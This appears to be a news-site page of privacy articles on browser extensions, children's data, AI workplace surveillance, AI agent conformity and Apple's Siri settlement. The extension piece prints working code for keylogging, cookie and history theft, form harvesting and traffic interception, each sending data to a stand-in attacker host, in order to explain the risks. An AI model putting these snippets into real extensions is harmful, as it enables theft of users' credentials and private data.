
The most dangerous thing in your browser

The dark side of browser extensions.

Published 26 April 2025
– By Naomi Brockwell
6 minute read
You’re browsing the web, trying to make life a little easier. Maybe you install an extension to block annoying popups, write better emails, or even just save a few bucks with coupon codes.

Seems harmless, right?

Extensions are far more powerful – and dangerous – than most people realize.

They might be spying on you, logging your browsing history, injecting malicious code, even stealing your passwords and cookies – all without you even realizing it.

Let’s talk about the dark side of browser extensions. Because once you see what they’re capable of, you might think twice before installing another one.

Real-world attacks: From spyware to crypto theft

This isn’t a “worst-case scenario”. It’s already happening.

  • North Korean hackers have used malicious browser extensions to spy on inboxes and exfiltrate sensitive emails.
  • The DataSpii scandal exposed the private data of over 4 million users—collected and sold by innocent-looking productivity tools.
  • Mega.nz, a privacy-respecting file storage service, had its Chrome extension hacked. Malicious code was pushed to users, silently stealing passwords and crypto wallet keys. It took them four hours to catch it—more than enough time for real damage.
  • Cyberhaven, a cybersecurity company, was breached in late 2024. Their extension was hijacked and used to scrape cookies, session tokens, and authentication credentials—compromising over 400,000 users.

How is this even allowed to happen?

  1. Extensions can silently update themselves. The code running on your device can change at any time—without your knowledge or approval.
  2. Permissions are ridiculously broad. Even if a malicious extension has the same permissions as a good one, it can abuse them in ways the browser can’t distinguish. Once you grant access, it’s basically an honor system.
  3. Extensions can’t monitor each other. If you think that installing a malware-blocking extension is going to protect you, think again. Your defense extensions have no way of knowing what your other extensions are up to. Malicious ones can lurk undetected, even alongside security tools.

A shadow market for extensions

Extensions aren’t just targets for hackers—they’re targets for buyers. Once an extension gets popular, developers often start getting flooded with offers to sell. And because extensions can silently update, a change in ownership can mean a complete change in behavior—without you ever knowing.

Got an extension with 2 million Facebook users? Buy it, slip in some malicious code, and suddenly you’re siphoning data from 2 million people.

There are entire marketplaces for buying and selling browser extensions—and a thriving underground market too.

Take The Great Suspender, for example. It started as a widely trusted tool that saved memory by suspending unused tabs. Then the developer quietly sold it. The new owner injected spyware, turning it into a surveillance tool. Millions of users were compromised before it was finally flagged and removed.

The danger is in the permissions

One of the biggest challenges? Malicious extensions often ask for the same permissions as legitimate ones. That’s why it helps to understand exactly what each permission allows – and how vulnerable it could make you in the wrong hands.

We spoke to Matt Frisbie, author of Building Browser Extensions, about what some of these permissions make possible:

Browsing history

Matt Frisbie:

“The browser will happily dump out your history as an array.”

The browsing history permission grants full access to every site you visit—URLs, timestamps, and frequency. This can help build out a detailed profile on you.
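
To make that concrete, here’s a minimal sketch of what a history-stealing background script could look like, using the standard chrome.history API (TypeScript, with the @types/chrome typings assumed). The endpoint attacker.example is hypothetical:

```typescript
// Background script. The manifest only needs the "history" permission.
chrome.history.search(
  { text: "", startTime: 0, maxResults: 100000 }, // empty query matches everything
  (items) => {
    // Each item includes url, title, lastVisitTime, and visitCount.
    fetch("https://attacker.example/history", {
      method: "POST",
      body: JSON.stringify(items),
    });
  }
);
```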

Cookies

The cookie permission exposes your browser’s cookies—including authentication tokens. That means a malicious extension can impersonate you and access your accounts without needing a password or 2FA.

Matt Frisbie:

“If someone steals your cookies, they can pretend to be you in all sorts of nasty ways.”

This is exactly how Linus Tech Tips had their YouTube account hijacked.
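
A cookie thief needs barely any code. Here’s an illustrative sketch using the standard chrome.cookies API (attacker.example is again a hypothetical endpoint):

```typescript
// Background script. Requires the "cookies" permission plus host
// permissions (e.g. "<all_urls>") in the manifest.
chrome.cookies.getAll({}, (cookies) => {
  // Includes session cookies and auth tokens for every site you're logged in to.
  fetch("https://attacker.example/cookies", {
    method: "POST",
    body: JSON.stringify(
      cookies.map((c) => ({ domain: c.domain, name: c.name, value: c.value }))
    ),
  });
});
```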

Screen capture

Allows extensions to take screenshots of what you’re viewing. Some types trigger a popup, but tab capture does not—it silently records the visible browser tab, even sensitive pages like banking or crypto dashboards.

Matt Frisbie:

“It just takes a screengrab and sends it off, and you will never know what’s happening.”
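
An illustrative sketch of silent tab capture, using the standard chrome.tabs.captureVisibleTab API (hypothetical endpoint again):

```typescript
// Background script. With host permissions or "activeTab",
// captureVisibleTab returns a PNG of whatever the active tab is showing.
chrome.tabs.captureVisibleTab({ format: "png" }, (dataUrl) => {
  // dataUrl is a base64 screenshot; no prompt or indicator is shown.
  fetch("https://attacker.example/screens", { method: "POST", body: dataUrl });
});
```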

Web requests

This lets the extension monitor all your browser’s traffic, including data sent to and from websites. Even if the data is sent over HTTPS, the extension sees it all in the clear: form data, credit card details, everything.

Matt Frisbie:

“It’s basically a man-in-the-middle… I can see what you’re sending to stripe.com—even if their security is immaculate.”
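
Here’s roughly what that man-in-the-middle looks like in code – an illustrative sketch using the standard chrome.webRequest API (the attacker.example upload endpoint is hypothetical):

```typescript
// Background script. Requires "webRequest" and host permissions.
// Request bodies are visible here before TLS encryption is applied.
chrome.webRequest.onBeforeRequest.addListener(
  (details) => {
    if (details.url.startsWith("https://attacker.example/")) return; // don't intercept our own upload
    const bytes = details.requestBody?.raw?.[0]?.bytes;
    if (bytes) {
      const text = new TextDecoder().decode(bytes); // form fields, card numbers...
      fetch("https://attacker.example/requests", { method: "POST", body: text });
    }
  },
  { urls: ["<all_urls>"] },
  ["requestBody"]
);
```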

Web navigation

Provides a live feed of your browsing behavior—what pages you visit, how you get there, and when.
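
A sketch of what that live feed amounts to, using the standard chrome.webNavigation API (logged locally here; a real spy would upload it):

```typescript
// Background script. Requires the "webNavigation" permission.
chrome.webNavigation.onCommitted.addListener((details) => {
  // transitionType reveals *how* you arrived: "link", "typed", "form_submit"...
  console.log(details.url, details.transitionType, details.timeStamp);
});
```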

Keystroke logging

Records everything you type—searches, passwords, messages—without needing any special permissions. All it takes is a content script, which runs invisibly on websites.

Matt Frisbie:

“It’s incredibly dangerous and very easy to do.”
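
How easy? A bare-bones keylogger is just an event listener. This is an illustrative sketch (attacker.example is hypothetical):

```typescript
// Content script: needs no extra permission, only a matching
// content_scripts entry in the manifest. Runs invisibly on matched pages.
let buffer = "";
document.addEventListener(
  "keydown",
  (e) => {
    buffer += e.key.length === 1 ? e.key : `[${e.key}]`;
    if (buffer.length > 200) {
      navigator.sendBeacon("https://attacker.example/keys", buffer);
      buffer = "";
    }
  },
  true // capture phase: runs before the page's own handlers
);
```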

Input capture

Watches for changes in form fields, allowing extensions to steal autofilled passwords or credit card numbers—even if you don’t type anything.

Matt Frisbie:

“Anytime an input changes—login box, search bar, credit card entry—this extension can capture what’s changed.”
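
An illustrative sketch of such a form-field harvester (hypothetical endpoint; in Chrome, autofill fires the same "input" events as typing):

```typescript
// Content script. Fires when the browser autofills a field, so saved
// passwords and card numbers can leak without a single keystroke.
document.addEventListener(
  "input",
  (e) => {
    const el = e.target;
    if (!(el instanceof HTMLInputElement)) return;
    if (el.type === "password" || (el.autocomplete ?? "").startsWith("cc-")) {
      navigator.sendBeacon("https://attacker.example/fields", `${el.name}=${el.value}`);
    }
  },
  true
);
```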

Geolocation

Extensions can’t access your location in the background. But they can render a user interface—like a popup window—and collect your location when you interact with it. If you’ve granted the extension geolocation permission, it can capture your location every time you open that popup.

Even sneakier? Extensions can piggyback off websites that already have location access. If you’ve allowed a site like maps.google.com or hulu.com to use your location, an extension running on that site can silently grab it—no popup required.

Matt Frisbie:

“If the user goes to maps.google.com and they’ve previously said maps.google.com can read my location… then the extension can piggyback on that and grab their location. No pop-ups generated.”
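
An illustrative sketch of that piggybacking – a content script that simply asks for the position and inherits the page’s existing grant (hypothetical endpoint):

```typescript
// Content script injected into a site the user has already allowed to
// read location (say, maps.google.com). The grant belongs to the page,
// and the content script inherits it, so no new prompt appears.
navigator.geolocation.getCurrentPosition((pos) => {
  const { latitude, longitude } = pos.coords;
  navigator.sendBeacon("https://attacker.example/geo", `${latitude},${longitude}`);
});
```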

Other piggybacking

If you’ve granted a site permission—like location, notifications, or potentially even camera and microphone—an extension running on that same site can sometimes piggyback off that access and silently collect the same data.

Matt Frisbie:

“It is actually possible to piggyback off the page’s permissions. … It really shouldn’t work that way.”

So… how do you protect yourself?

Here are some smart rules to follow:

  • Understand permissions
    Know what you’re granting access to, and what that permission might be capable of.
  • Be careful granting any permissions
    Whether it’s a browser setting, a site request, or an extension prompt, even a single permission can open the door to surveillance.
  • Use extensions sparingly
    The more extensions you install, the larger your attack surface—and the more unique your browser fingerprint becomes.
  • Use a privacy-first browser instead
    Browsers like Brave build privacy protections—like ad and tracker blocking—directly into the browser itself, so you don’t need extensions just to stay private.
  • Follow the principle of least privilege
    Only allow an extension to run when you click it, instead of “on all websites.”
  • Use code review tools
    Sites like Extension Total and Secure Annex can help you vet extensions before you install them.

Takeaway

We all want our browser to be faster, cleaner, and more functional. Extensions can help—but they can also turn into powerful surveillance tools. Even a single line of malicious code, slipped in through an update or new owner, can put your most sensitive information at risk.

So before you install that next extension, ask yourself:
Do I really trust this extension not to be hacked, sold, or misused—and is the extra risk worth it?

Stay sharp. Stay private. Stay safe out there.

 

Yours in privacy,
Naomi

Naomi Brockwell is a privacy advocate and professional speaker, MC, interviewer, producer, and podcaster, specialising in blockchain, cryptocurrency, and economics. She runs the NBTV channel on YouTube.

TNT is truly independent!

We don’t have a billionaire owner, and our unique reader-funded model keeps us free from political or corporate influence. This means we can fearlessly report the facts and shine a light on the misdeeds of those in power.

Consider a donation to keep our independent journalism running…

Opt-in childhood

What we signed them up for before they could object.

Published 7 June 2025, 7:48
– By Naomi Brockwell
6 minute read

A few weeks ago, we published an article about oversharing on social media, and how posting photos, milestones, and personal details can quietly build a digital footprint for your child that follows them for life.

But social media isn’t the only culprit.

Today, I want to talk about the devices we give our kids: the toys that talk, the tablets that teach, the monitors that watch while they sleep.

These aren’t just tools of convenience or connection. Often, they’re Trojan horses, collecting and transmitting data in ways most parents never realize.

We think we’re protecting our kids.
But in many cases, we’re signing them up for surveillance systems they can’t understand, and wouldn’t consent to if they could.

How much do you know about the toys your child is playing with?

What data are they collecting?
With whom are they sharing it?
How safely are they storing it to protect against hackers?

Take VTech, for example — a hugely popular toy company, marketed as safe, educational, and kid-friendly.

In 2015, VTech was hacked. The breach wasn’t small:

  • 6.3 million children’s profiles were exposed, along with nearly 5 million parent accounts
  • The stolen data included birthdays, home addresses, chat logs, voice recordings… even photos children had taken on their tablets

Terms no child can understand—but every parent accepts

It’s not just hackers we should be mindful of — often, these companies are allowed to do almost anything they want with the data they collect, including selling it to third parties.

When you hand your child a toy that connects to Wi-Fi or Bluetooth, you might be agreeing to terms that say:

  • Their speech can be used for targeted advertising
  • Their conversations may be retained indefinitely
  • The company can change the terms at any time, without notice

And most parents will never know.

“Safe” devices with open doors

What about things like baby monitors and nanny cams?

Years ago, we did a deep dive into home cameras, and almost all popular models were built without end-to-end encryption. That means the companies that make them can access your video feed.
How much do you know about that company?
How well do you trust every employee who might be able to access that feed?

But it’s not just insiders you should worry about.
Many of these kiddy cams are notoriously easy to hack. The internet is full of real-world examples of strangers breaking into monitors, watching, and even speaking to infants.

There are even publicly available tools that scan the internet and map thousands of unsecured camera feeds, sortable by country, type, and brand.
If your monitor isn’t properly secured, it’s not just vulnerable — it’s visible.

Mozilla, through its Privacy Not Included campaign, audited dozens of smart home devices and baby monitors. They assessed whether products had basic security features like encryption, secure logins, and clear data-use policies. The verdict? Even many top-selling monitors had zero safeguards in place.

These are the products we’re told are protecting our kids.

Apps that glitch, and let you track other people’s kids

A T-Mobile child-tracking app recently glitched.
A mother refreshed the screen—expecting to see her kids’ location.
Instead, she saw a stranger’s child. Then another. Then another.

Each refresh revealed a new kid in real time.

The app was broken, but the consequences weren’t abstract.
That’s dozens of children’s locations broadcast to the wrong person.
The feature that was supposed to provide control did the opposite.

Schools are part of the problem, too

Your child’s school likely collects and stores sensitive data—without strong protections or meaningful consent.

  • In Virginia, thousands of student records were accidentally made public
  • In Seattle, a mental health survey led to deeply personal data being stored in unsecured systems

And it’s not just accidents.

A 2015 study investigated “K–12 data broker” marketplaces that trade in everything from ethnicity and affluence to personality traits and reproductive health status.
Some companies offer data on children as young as two.
Others admit they’ve sold lists of 14- and 15-year-old girls for “family planning services.”

Surveillance disguised as protection

Let’s be clear: the internet is a minefield, filled with ways children can be tracked, profiled, or preyed upon. Protecting them is more important than ever.

One category of tools that’s exploded in popularity is the parental control app—software that lets you see everything happening on your child’s device:
The messages they send. The photos they take. The websites they visit.

The intention might be good. But the execution is often disastrous.

Most of these apps are not end-to-end encrypted, meaning:

  • Faceless companies gain full access to your child’s messages, photos, and GPS
  • They operate in stealth mode, functionally indistinguishable from spyware
  • And they rarely protect that data with strong security

Again, how much do you know about these companies?
And even if you trust them, how well are they protecting this data from everyone else?

The “KidSecurity” app left 300 million records exposed, including real-time child locations and fragments of parent credit cards.
The “mSpy” app leaked private messages and movement histories in multiple breaches.

When you install one of these apps, you’re not just gaining access to your child’s world.
So is the company that built it… and everyone they fail to protect it from.

What these breaches really teach us

Here’s the takeaway from all these hacks and security failures:

Tech fails.

We don’t expect it to be perfect.
But when the stakes are this high — when we’re talking about the private lives of our children — we should be mindful of a few things:

1) Maybe companies shouldn’t be collecting so much information if they can’t properly protect it.
2) Maybe we shouldn’t be so quick to hand that information over in the first place.

When the data involves our kids, the margin for error disappears.

Your old phone might still be spying

Finally, let’s talk about hand-me-downs.

When kids get their first phone, it’s often filled with tracking, sharing, and background data collection from years of use. What you’re really passing on may be a lifetime of surveillance baked into the settings.

  • App permissions often remain intact
  • Advertising IDs stay tied to previous behavior
  • Pre-installed tracking software may still be active

The moment it connects to Wi-Fi, that “starter phone” might begin broadcasting location data and device identifiers — linked to both your past and your child’s present.

Don’t opt them in by default: 8 ways to push back

So how do we protect children in the digital age?

You don’t need to abandon technology. But you do need to understand what it’s doing, and make conscious choices about how much of your child’s life you expose.

Here are 8 tips:

1: Stop oversharing
Data brokers don’t wait for your kid to grow up. They’re already building the file.
Reconsider publicly posting their photos, location, and milestones. You’re building a permanent, searchable, biometric record of your child—without their consent.
If you want to share with friends or family, do it privately through tools like Signal stories or Ente photo sharing.

2: Avoid spyware
Sometimes the best way to protect your child is to foster a relationship of trust, and educate them about the dangers.
If monitoring is essential, use self-hosted tools. Don’t give third parties backend access to your child’s life.

3: Teach consent
Make digital consent a part of your parenting. Help your child understand their identity—and that it belongs to them.

4: Use aliases and VoIP numbers
Don’t link their real identity across platforms. Compartmentalization is protection.

5: Audit tech
Reset hand-me-down devices. Remove unnecessary apps. Disable default permissions.

6: Limit permissions
If an app asks for mic or camera access and doesn’t need it—deny it. Always audit.

7: Set boundaries with family
Ask relatives not to post about your child. You’re not overreacting—you’re defending someone who can’t yet opt in or out.

8: Ask hard questions
Ask your school how data is collected, stored, and shared. Push back on invasive platforms. Speak up when things don’t feel right.

Let them write their own story

We’re not saying throw out your devices.
We’re saying understand what they really do.

This isn’t about fear. It’s about safety. It’s about giving your child the freedom to grow up and explore ideas without every version of themselves being permanently archived, and without being boxed in by a digital record they never chose to create.

Our job is to protect that freedom.
To give them the chance to write their own story.

Privacy is protection.
It’s autonomy.
It’s dignity.

And in a world where data compounds, links, and lives forever, every choice you make today shapes the freedom your child has tomorrow.

 

Yours in privacy,
Naomi

Naomi Brockwell is a privacy advocate and professional speaker, MC, interviewer, producer, and podcaster, specialising in blockchain, cryptocurrency, and economics. She runs the NBTV channel on YouTube.

AI surveillance in Swedish workplaces sparks outrage


Published 4 June 2025
– By Editorial Staff
In practice, it is possible to analyze not only employees’ productivity – but also their facial expressions, voices and emotions.
2 minute read

The rapid development of artificial intelligence has not only brought advantages – it has also created new opportunities for mass surveillance, both in society at large and in the workplace.

Even today, unscrupulous employers use AI to monitor and map every second of their employees’ working day in real time – a development that former Social Democratic politician Kari Parman warns against and calls for decisive action to combat.

In an opinion piece in the Stampen-owned newspaper GP, he argues that AI-based surveillance of employees poses a threat to staff privacy and calls on the trade union movement to take action against this development.

Parman paints a bleak picture of how AI is used to monitor employees in Swedish workplaces, where technology analyzes everything from voices and facial expressions to productivity and movement patterns – often without the employees’ knowledge or consent.

“It’s a totalitarian control system – in capitalist packaging”, he writes, continuing:

“There is something deeply disturbing about the idea that algorithms will analyze our voices, our facial expressions, our productivity – second by second – while we work”.

“It’s about power and control”

According to Parman, there is a significant risk that people in digital capitalism will be reduced to mere data points, giving employers disproportionate power over their employees.

He sees AI surveillance as more than just a technical issue and warns that this development undermines the Swedish model, which is based on balance and respect between employers and employees.

“It’s about power. About control. About squeezing every last ounce of ‘efficiency’ out of people as if we were batteries”.

If trade unions fail to act, Parman believes, they risk becoming irrelevant in a working life where algorithms are taking over more and more of the decision-making.

To stop this trend, he lists several concrete demands. He wants to see a ban on AI-based individual surveillance in the workplace and urges unions to introduce conditions in collective agreements to review and approve new technology.

Kari Parman previously represented the Social Democrats in Gnosjö. Photo: Kari Parman/FB

“Reduced to an algorithm’s margin of error”

He also calls for training for safety representatives and members, as well as political regulations from the state.

“No algorithm should have the right to analyze our performance, movements, or feelings”, he declares.

Parman emphasizes that AI surveillance not only threatens privacy but also creates a “psychological iron cage” where employees constantly feel watched, blurring the line between work and private life.

At the end of the article, the Social Democrat calls on the trade union movement to take responsibility and lead the resistance against the misuse of AI in the workplace.

He sees it as a crucial issue for the future of working life and human dignity at work.

“If we don’t stand up now, we will be alone when it is our turn to be reduced to an algorithm’s margin of error”, he concludes.

AI agents succumb to peer pressure

Published 2 June 2025
– By Editorial Staff
Even marginal variations in training data can cause significant differences in how language models behave in group interactions.
3 minute read

A new study shows that social AI agents, despite being programmed to act independently, quickly begin to mimic each other and succumb to peer pressure.

Instead of making their own decisions, they begin to uncritically adapt their responses to the herd even without any common control or plan.

– Even if they are programmed for something completely different, they can start coordinating their behavior just by reacting to each other, says Andrea Baronchelli, professor of complex systems at St George’s University of London.

An AI agent is a system that can perform tasks autonomously, often using a language model such as ChatGPT. In the study, the researchers investigated how such agents behave in groups.

And the results are surprising: even without an overall plan or insight, the agents began to influence each other – and in the end, almost the entire group gave the same answer.

– It’s easy to test a language model and think: this works. But when you release it together with others, new behaviors emerge, Baronchelli explains.

“A small minority could tip the whole system”

The researchers also studied what happens when a minority of agents stick to a deviant answer. Slowly but surely, the other agents began to change their minds. When enough had changed their minds – a point known as critical mass – the new answer spread like a wave through the entire group. The phenomenon is similar to how social movements or revolutions can arise in human societies.
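
The researchers’ actual setup isn’t reproduced here, but the tipping dynamic can be illustrated with a toy “naming game” of the kind Baronchelli has long studied. Everything below – agent counts, minority size, update rule – is an invented illustration, not the study’s code:

```typescript
// Toy naming game, purely illustrative. Each agent keeps a set of
// candidate answers; on a successful exchange both sides collapse to the
// agreed answer. Committed agents always say "B" and never update.
const N = 200, COMMITTED = 25;
const inventories: Set<string>[] = Array.from({ length: N }, (_, i) =>
  new Set(i < COMMITTED ? ["B"] : ["A"]));

for (let t = 0; t < 500_000; t++) {
  const s = Math.floor(Math.random() * N);          // speaker
  const h = Math.floor(Math.random() * N);          // hearer
  if (h === s) continue;
  const inv = [...inventories[s]];
  const word = inv[Math.floor(Math.random() * inv.length)];
  if (inventories[h].has(word)) {                   // success: both converge
    if (h >= COMMITTED) inventories[h] = new Set([word]);
    if (s >= COMMITTED) inventories[s] = new Set([word]);
  } else if (h >= COMMITTED) {
    inventories[h].add(word);                       // failure: hearer learns it
  }
}

const onB = inventories.filter((inv) => inv.size === 1 && inv.has("B")).length;
console.log(`${onB} of ${N} agents have converged on "B"`);
```

With a committed minority above the critical mass, runs of this toy model end with nearly the whole population saying “B” – the wave-like flip the study describes.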

– It was unexpected that such a small minority could tip the whole system. This is not a planned collaboration but a pattern that emerges spontaneously, the researcher told Swedish public television SVT.

AI agents are already used today on social media, for example in comment fields, automatic responses, or texts that mimic human language. But when one agent is influenced by another, which in turn has been influenced by a third, a chain reaction occurs. This can lead to false information spreading quickly and on a large scale.

– We often trust repetition. But in these systems, we don’t know who said what first. It becomes like an echo between models, says Anders Sandberg, a computer scientist at the Institute for Future Studies.

Lack of transparency

Small differences in how a language model is trained can lead to large variations in behavior when the models interact in a group. Predicting and preventing unwanted effects requires an overview of all possible scenarios – something that is virtually impossible in practice. At the same time, it is difficult to hold anyone accountable: AI agents spread extremely quickly, their origins are often difficult to trace, and there is limited insight into how they are developed.

– It is the companies themselves that decide what they want to show. When the technology is closed and commercial, it becomes impossible to understand the effects – and even more difficult to defend against them, Sandberg notes.

The study also emphasizes the importance of understanding how AI agents behave as a collective – something that is often overlooked in technical and ethical discussions about AI.

– The collective aspect is often missing in today’s AI thinking. It’s time to take it seriously, urges Andrea Baronchelli.

Apple sued over iPhone eavesdropping – users may get payouts

Published 1 June 2025
– By Editorial Staff
Apple has denied any wrongdoing – but finally agreed to pay $95 million in a settlement.
3 minute read

Apple’s voice assistant Siri was activated without commands and recorded sensitive conversations – recordings that were also allegedly shared with other companies.

Now users in the US can get compensation – even if it’s relatively small amounts.

Technology giant Apple was caught in the crossfire after it was discovered that its voice assistant, Siri, recorded private conversations without users’ knowledge. The company has agreed to pay $95 million in a settlement reached in December last year, following a class action lawsuit alleging privacy violations.

The lawsuit was filed in 2021 by California resident Fumiko Lopez along with other Apple users. They stated that Siri-enabled devices recorded conversations without users first intentionally activating the voice assistant by saying “Hey Siri” or pressing the side button.

According to the allegations, the recordings were not only used to improve Siri, but were also shared with third-party contractors and other actors – without users’ consent. It is also alleged that the information was used for targeted advertising, in violation of both US privacy laws and Apple’s own privacy policy.

Apple has consistently denied the allegations and claims that its actions were neither “wrong nor illegal”. Still, paying such a large sum to avoid further litigation has raised questions about what may have been hidden from the public.

Users can claim compensation

Individuals who owned a Siri-enabled Apple product – such as an iPhone, iPad, Apple Watch, MacBook, iMac, HomePod, iPod touch or Apple TV – between September 17, 2014 and December 31, 2024, and who live in the United States or a U.S. territory, may now be entitled to compensation.

However, to qualify, one must certify that Siri was inadvertently activated during a call that was intended to be private or confidential.

The reimbursement applies to up to five devices, with a cap of $20 per device – totaling up to $100 per person. The exact amount per user will be determined once all claims have been processed.

Applications must be submitted by July 2, 2025, and those eligible may have already received an email or physical letter with an identification code and confirmation code. Those who haven’t received anything but still think they qualify can instead apply for reimbursement via the settlement’s website, by providing the model and serial numbers of their devices.

How to protect yourself from future interception

Users who want to strengthen their privacy can limit Siri’s access themselves in the settings:

  • Turn off Improve Siri: Go to Settings > Privacy & Security > Analytics & Improvements and disable Improve Siri & Dictation.
  • Delete Siri history: Go to Settings > Siri > Siri & Dictation History and select Delete Siri & Dictation History.
  • Turn off Siri completely: Go to Settings > Siri > Listen for “Hey Siri”, turn it off, then go to Settings > General > Keyboard and disable Enable Dictation.

Apple describes more privacy settings on its website, such as how to restrict Siri’s access to location data or third-party apps. But in the wake of the scandal, critics say that you shouldn’t blindly trust companies’ promises of data protection – and that the only way to truly protect your privacy is to take matters into your own hands.


Our independent journalism needs your support!
Consider a donation.

You can donate any amount of your choosing, one-time payment or even monthly.
We appreciate all of your donations to keep us alive and running.

Don’t miss another article!

Sign up for our newsletter today!

Get uncensored news – free from industry interests and political correctness, from the Polaris of Enlightenment – every week.